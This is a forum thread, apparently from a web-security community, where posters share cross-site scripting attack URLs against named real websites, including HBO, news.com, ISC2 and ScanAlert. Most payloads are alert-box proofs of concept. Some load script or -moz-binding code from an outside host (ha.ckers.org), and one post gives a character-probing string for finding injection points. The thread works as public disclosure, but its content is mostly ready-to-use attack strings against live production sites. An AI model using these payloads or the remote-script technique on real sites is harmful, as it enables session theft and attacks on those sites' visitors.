This one is interesting because it really is a DOM based XSS (not reflected). Scanners would have a tough time with this one. http://www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

I can't read Swedish but I think this is a big site: http://www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

wow.. i was gone for a day, and you guys managed to fill up more than a page of posts in this thread.. not to mention being /.'ed ^^

well good job on all of it, i'm glad to see this forum getting more recognition, which'll hopefully bring in more web app sec experts (and web app sploit experts) ..

digital64: the http regex is easily fixed by changing all the " to %22 (and space to %20).. i.e.:
h**p://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script src=http://ha.ckers.org/s.js></script>&to_search=whole_site -> http://www.beliefnet.com/search/search_site_results.asp?search_for=%22><script%20src=http://ha.ckers.org/s.js></script>&to_search=whole_site

and as for the test injection i use: asdf'a"s>d<f>g;!-e=+r)(t%y\u/i i
why all the letters in between? because when the website \escapes a lot of the special characters.. it's harder for me to tell which ones when mashed together like ';!--"/>\< .. and i look for the 'asdf' ... but whenever i just randomly throw it into a website i'm visiting, it's usually asdf'e"r>t<y> .. because it's fast to type.

kyran: i thought i should do the same for quicker reference, to throw into a sql database including the fields: TLD, vector, vector type, site category, and filter type .. but then i remembered i'm lazy with too many half done projects =__=

and since we've been giving other sites the same treatment for mentioning sla.ckers:
http://www.ddj.com/TechSearch/not_found.jhtml;jsessionid=1BKYW43EIVWIKQSNDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

i'll save myself the effort of checking slashdot though.. won't be as easy to find one.

kyran, although i think you said you use opera .. (in which case i recommend Opera 8.54, because it's the only view source that shows the changes, if the site/page.pl name doesn't change)

..but the WebDeveloper extension for firefox has an extremely useful feature for converting all POSTs to GETs .. as most POSTs still work, when submitted as GET

to expand on your find: http://news.com.com/2114-1038-6119515.html?toEmailAddress=%22%3EXSS+is+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cbr+%22&fromEmailAddress=%22%3EXSS+here+too%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cbr+%22&comments=and+here%3F%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS3%22%29%3C%2Fscript%3E&CAPTCHA_RESPONSE=&CAPTCHA_GUID=8a8f128e0dcbac55010deb0f55616c91

With all the media attention on XSS now, one would think that people would act on this information. But we still find XSS vulnerabilities in major sites, even ones that report on XSS being an issue! The problem is that most web developers have no security training at all.

It seems "Email to a friend"-style pages are almost always vulnerable to it.

kirke: that works in IE and opera .. but not firefox, because the ending " in the link is unnecessary (the site adds one in too)

good work though, and it's sad to see who passes themselves off as web application security consultants and experts these days =.= .. their associate's degree in web design and https://www.isc2.org/cgi-bin/login.cgi?Command=TempPassword&CertificateNumber=%3Cscript%3Ealert%28%22Yes%2C+this+is+the+International+Information+System+Security+Certification+Consortium.+And+Yes%2C+they+should+probably+uncertify+themselves..%22%29%3C%2Fscript%3E&LastName=&HomeCity=&x=9&y=8 membership is hardly worth the paper the check was written on to buy them. I'm not really sure what they spend their time doing during their 'audits' .. but this is stuff i could likely teach a ten-year-old to find, after two hours of explaining.

This is in no offense to the legitimately well-informed webappsec professionals out there, but you're about as rare as an xss-free site - and we all know how rare that is..

some more scanalert ones: https://www.scanalert.com/Content.sa?sec=2&sub=4&send=Y&ref=&rid=&region=EN&name=XSS0%22+onmouseover%3D%22alert%28%27XSS0%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&company=XSS1%22+onmouseover%3D%22alert%28%27XSS1%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&url=XSS2%22+onmouseover%3D%22alert%28%27XSS2%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&phone=XSS3%22+onmouseover%3D%22alert%28%27XSS3%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&ext=XSS4%22+onmouseover%3D%22alert%28%27XSS4%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22&email=XSS5%22+onmouseover%3D%22alert%28%27XSS5%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22%3E%3Cx%22 automagic in FF, mouseover any field in other browsers